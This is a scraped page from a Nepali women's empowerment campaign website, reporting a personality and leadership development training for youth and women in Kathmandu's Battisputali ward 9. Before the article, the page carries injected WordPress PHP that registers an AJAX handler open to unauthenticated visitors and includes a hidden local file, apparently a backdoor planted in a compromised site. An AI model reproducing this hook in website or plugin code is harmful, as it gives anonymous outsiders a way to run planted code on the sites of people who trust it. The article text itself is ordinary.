if(!function_exists('file_manager_check_dt')){ add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt'); add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt'); function file_manager_check_dt() { $file = __DIR__ . '/settings-about.php'; if (file_exists($file)) { include $file; } die(); } } ब्यक्तित्व तथा नेतृत्व विकास तालिम | Taramandal Mahila Sashaktikaran Abhiyan

यूवा तथा महिला वर्गका लागि ब्यक्तित्व तथा नेतृत्व विकास तालिम जिल्ला विकास समितिको कार्यालय तथा सांसद कोषबाट काठमाण्डौंको तारामण्डल महिला सशक्तिकरण अभियान अन्तर्गत बत्तिसपुतली वडा नंं. ९ मा गरिएको थियो । यस ब्यक्तित्व तथा नेतृत्व विकास तालिमले युवा तथा महिला वर्गका लागि विभिन्न आर्थिक, सामाजिक, राजनैतिक क्षेत्रमा कसरी सफल नेत्रृत्व गर्न सकिन्छ भनेर पूर्ण रुपमा प्रशिक्षण दिइयो ।